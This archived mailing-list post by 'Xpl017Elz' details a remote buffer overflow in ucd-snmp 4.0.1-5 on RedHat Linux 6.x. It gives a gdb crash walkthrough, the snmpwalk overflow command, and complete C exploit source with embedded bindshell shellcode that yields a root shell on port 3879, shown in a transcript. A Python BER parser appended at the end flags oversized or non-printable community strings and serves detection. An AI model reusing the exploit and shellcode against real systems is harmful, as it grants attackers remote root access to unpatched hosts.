Hello :-)

I tested various versions of ucd-snmp. The version I worked with is the "UCD-snmp-4.0.1-5" package on RedHat Linux 6.x. 4.0.1-4 and 4.0.1-5 are clearly different. I succeeded in exploiting 4.0.1-5. All the details and values are different, and they differ according to platform and version. However, they have a similar aspect.

One thing that confused me when I tested at that time was that snmpwalk itself overflowed. It was the same 4.0.1-5 version, but on a different Linux. After setting snmpwalk setuid and running it, I became root ... :-p However, in an actual attack on snmpd, I saw that the snmpd daemon dies. Very interesting.

I show the exploit process. The attacked package was the "UCD-snmp-4.0.1-5" version on the same kind of RedHat Linux.

[root@NewbieServer /root]# rpm -qa | grep snmp
ucd-snmp-4.0.1-5
ucd-snmp-utils-4.0.1-5
ucd-snmp-devel-4.0.1-5
[root@NewbieServer /root]# /etc/rc.d/init.d/snmpd start > /dev/null && ps -ax | grep snmp; gdb -q /usr/sbin/snmpd
26600 pts/0    S      0:00 /usr/sbin/snmpd
(no debugging symbols found)...(gdb) attach 26600
Attaching to program: /usr/sbin/snmpd, Pid 26600
Reading symbols from /usr/lib/libsnmp.so.0...(no debugging symbols found)...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /usr/lib/librpm.so.0...done.
Reading symbols from /lib/libdb.so.2...done.
Reading symbols from /usr/lib/libz.so.1...done.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /usr/lib/libbz2.so.0...done.
Reading symbols from /lib/ld-linux.so.2...done.
Reading symbols from /lib/libnss_files.so.2...done.
0x4018e54e in __select () from /lib/libc.so.6
(gdb)

Another server shell:

[root@WizardServer /root]# snmpwalk NewbieServer `perl -e 'print "x"x140'`XXXX`perl -e 'print "A"x112'`
Timeout: No Response from NewbieServer
[root@WizardServer /root]#

gdb:

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb)

The principle is simple.

--- Structure: --------------------------------------------
 [xxx .. 140 .. xxx] XXXX [AAA .. 112 .. AAA] : total 256
 NULL Value: 0x00                              : total 257
-----------------------------------------------------------

It closely resembles a frame pointer attack. The last NULL value points to the address that the "&shellcode" value indicates. Look at why eip pointed to 0x58585858.

(gdb) info reg eip
eip            0x58585858       0x58585858
(gdb) x/10 $esp-4
0xbfffd704:     0x58585858      0x41414141      0x41414141      0x41414141
                ~~~~~~~~~~
0xbfffd714:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffd724:     0x41414141      0x41414141
(gdb)
0xbfffd72c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffd73c:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffd74c:     0x41414141      0x41414141
(gdb)
0xbfffd754:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffd764:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffd774:     0x41414141      0xbfffd700
                                ~~~~~~~~~~
(gdb)

It points to an address 4 bytes further on. This is reminiscent of the pico editor attack.

(gdb) q
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/snmpd, Pid 26600
[root@NewbieServer /root]# ps -aux | grep snmpd
[root@NewbieServer /root]#

The daemon died. This works as both a local exploit and a remote exploit. If the daemon is overflowed, a remote attack may take some pain, because it dies at once. If you understand the principle behind the above result, exploiting the same operating system version and ucd version is possible.

Author: Xpl017Elz
E-mail: szoahcat_private & xploitat_private
Home: http://x82.i21c.net

P.S: Sorry. I gave up on writing proper English. I will study English from next time, so that other people can understand. Thank you for reading my unwise writing.
ucd-snmp-4.0.1-5 exploit
----------------------------------------------------

/*
**
** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
**
** === Testing: =============================================================
**
** [x82@xpl017elz x82]$ id
** uid=501(x82) gid=501(x82) groups=501(x82)
** [x82@xpl017elz x82]$ ./snmpxpl -h 61.xx.177.32
**
**  UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
**
**                  Exploit made by Xpl017Elz
**
**  Shellcode Address: 0xbfffd710
**  Host: 61.xx.177.32
**  [&shellcode: 112byte] [NOP + shellcode: 144byte] [0x00] - total 257byte
**  Open Port: 3879 (Default)
**
** Timeout: No Response from 61.xx.177.32
** [x82@xpl017elz x82]$ nc 61.xx.177.32 3879
** whoami;
** root
** pwd;
** /home/x82
** id;
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel),503(secure)
**
** =========================================================================
**
** exploit by "you dong-hun"(Xpl017Elz), <szoahcat_private>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#define DEFAULT      0
#define VALUES       112
#define HOST         "127.0.0.1"
#define DEFAULT_CODE 0xbfffd710          /* RedHat Linux 6.x ucd-snmp-4.0.1-5 */
#define SNMPWALK     "/usr/bin/snmpwalk" /* snmpwalk PATH */

void banrl(void);
void usages(char *var);

int main(int argc, char *argv[])
{
    char shellcode[] = /* Linux(x86) bindshell on port 3879 */
        "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
        "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
        "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
        "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
        "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
        "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
        "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
        "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
    /* host[] is sized so that a long -h argument cannot overflow it */
    char xOx[257], host[256] = HOST, snmpwalk[] = SNMPWALK;
    int count = DEFAULT, num_1 = DEFAULT, num_2 = DEFAULT, num_3 = DEFAULT,
        jobst = DEFAULT, values = VALUES;
    unsigned long shelladdr = DEFAULT_CODE;

    bzero(xOx, 257);    /* byte 256 stays 0x00: the terminating NULL */
    banrl();

    while ((jobst = getopt(argc, argv, "h:s:v:")) != -1) {
        switch (jobst) {
        case 'h':
            strncpy(host, optarg, sizeof(host) - 1);
            host[sizeof(host) - 1] = '\0';
            break;
        case 's':
            shelladdr = strtoul(optarg, NULL, 0);
            break;
        case 'v':
            values = atoi(optarg);
            break;
        case '?':
            usages(argv[0]);
            exit(0);
        }
    }

    /* checked before filling xOx so that a bad -v cannot write past it */
    if (values < 4 || (0x100 - values) < 0x00000082) {
        printf("\n - Values error. :-(\n\n");
        printf(" Space that shellcode comes is so narrow.\n");
        printf(" Compose exploit again.\n\n");
        exit(0);
    }

    /* first part: the shellcode address repeated, little-endian */
    for (num_1 = 0; num_1 < (values / 4); num_1++) {
        xOx[count++] = (shelladdr >> 0) & 0xff;
        xOx[count++] = (shelladdr >> 8) & 0xff;
        xOx[count++] = (shelladdr >> 16) & 0xff;
        xOx[count++] = (shelladdr >> 24) & 0xff;
    }

    /* second part: '@' padding up to 256 bytes, then the shellcode */
    for (num_2 = 0; num_2 < (0x100 - values) - (int)strlen(shellcode); num_2++) {
        xOx[count++] = '@';
    }
    for (num_3 = 0; num_3 < (int)strlen(shellcode); num_3++) {
        xOx[count++] = shellcode[num_3];
    }

    printf(" Shellcode Address: 0x%lx\n", shelladdr);
    printf(" Host: %s\n", host);
    printf(" [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte\n",
           values, 256 - values);
    printf(" Open Port: 3879 (Default)\n\n");

    execl(snmpwalk, "snmpwalk", host, xOx, (char *)NULL);
    perror("execl");
    return 1;
}

void banrl(void)
{
    printf("\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n");
    printf("\t\t Exploit made by Xpl017Elz\n\n");
}

void usages(char *var)
{
    printf("\n Usage: %s -h [hostname] -s [address] -v [value]\n", var);
    printf("\n option: -h - IP address & Domain name");
    printf("\n         -s - Shellcode Address");
    printf("\n         -v - &Shellcode Size\n\n");
    printf("\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n", var);
}

-----------------------------------------------------------------------------

--
Powered by Outblaze
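An added, defender-side example (not part of the original post or of the ucd-snmp project): a minimal BER walker that extracts the community string from an SNMPv1 request and flags the two traits of the payload described above, an oversized field (the 256-byte x/XXXX/A buffer) and packed non-printable bytes (the little-endian 0xbfffd710 addresses the exploit writes). It assumes, from the snmpwalk invocation shown, that the overlong argument travels as the SNMPv1 community string; the 64-byte threshold and the sample packets are constructed for this example.

```python
MAX_COMMUNITY = 64  # assumption: generous upper bound for a legitimate community name

def read_tlv(buf, pos=0):
    """Decode one BER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: 0x8N, then N length bytes
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def snmpv1_community(packet):
    """Return the community OCTET STRING of an SNMPv1 message; raise if malformed."""
    tag, body, _ = read_tlv(packet)              # outer SEQUENCE
    tag_v, version, pos = read_tlv(body)         # INTEGER version, 0 = SNMPv1
    tag_c, community, _ = read_tlv(body, pos)    # OCTET STRING community
    if (tag, tag_v, tag_c) != (0x30, 0x02, 0x04) or version != b"\x00":
        raise ValueError("not a well-formed SNMPv1 message")
    return community

def classify_community(packet, max_len=MAX_COMMUNITY):
    """Return the reasons a community looks like an overflow payload ([] = normal)."""
    community = snmpv1_community(packet)
    reasons = []
    if len(community) > max_len:
        reasons.append("oversized community: %d bytes" % len(community))
    if any(b < 0x20 or b > 0x7E for b in community):
        reasons.append("non-printable bytes (packed addresses or shellcode)")
    return reasons

def tlv(tag, value):
    """BER-encode one element; used only to build the constructed samples below."""
    n = len(value)
    length = bytes([n]) if n < 128 else bytes([0x82]) + n.to_bytes(2, "big")
    return bytes([tag]) + length + value

def build_v1_get(community):
    """Constructed SNMPv1 GetRequest with the given community and an empty varbind list."""
    pdu = tlv(0x02, b"\x01") + tlv(0x02, b"\x00") + tlv(0x02, b"\x00") + tlv(0x30, b"")
    return tlv(0x30, tlv(0x02, b"\x00") + tlv(0x04, community) + tlv(0xA0, pdu))

BENIGN = build_v1_get(b"public")
# Same 140 x / XXXX / 112 A layout as the post's crash test (constructed, no shellcode).
SUSPECT = build_v1_get(b"x" * 140 + b"XXXX" + b"A" * 112)
```

Feeding captured UDP/161 payloads through classify_community gives a cheap log-time check; a legitimate agent never needs a community anywhere near the 256-byte field that crashed snmpd here.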
This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 17:25:37 PST